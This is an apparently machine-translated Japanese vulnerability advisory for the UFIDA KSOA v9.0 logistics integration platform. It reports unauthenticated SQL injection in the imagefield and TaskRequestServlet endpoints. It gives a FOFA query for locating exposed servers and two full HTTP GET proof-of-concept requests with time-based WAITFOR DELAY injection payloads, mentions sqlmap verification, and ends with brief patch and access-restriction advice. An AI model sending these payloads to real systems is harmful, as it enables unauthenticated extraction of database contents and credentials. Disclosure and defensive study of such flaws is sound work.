0x01 製品紹介
UFIDA KSOAは、SOAの考え方に基づいて開発された新世代の製品で、物流会社のさまざまな時代に構築されたITシステムを相互に通信できる、物流会社の最先端のニーズに合わせて誕生した統合ITインフラです。流通企業が元の IT 投資を保護し、IT 管理を簡素化し、競争力を強化し、会社全体の戦略目標とイノベーション活動を確実に実現できるように支援します。
0x02 脆弱性の概要
UFIDA KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet インターフェイスと /servlet/imagefield インターフェイスには SQL インジェクションの脆弱性があり、認証されていない攻撃者はこの脆弱性を通じてデータベースの機密情報と資格情報を取得でき、最終的にサーバーがクラッシュ。
0x03 影響範囲
ウフィーダ KSOA v9.0
0x04 再発環境
FOFA: app="ヨンヨウ-時空KSOA"
0x05 脆弱性の再発
PoC-1
GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27;WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close
射出遅延を 10 秒設定する
sqlmap認証
実証実験-2
GET /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close
sqlmap認証
0x06 修復の提案
暫定緩和計画
アクセス元アドレスを制限し、必要な場合以外はシステムをインターネットに公開しないでください。
アップグレード修正
安全なバージョンにアップグレードするか、パッチを適用してください。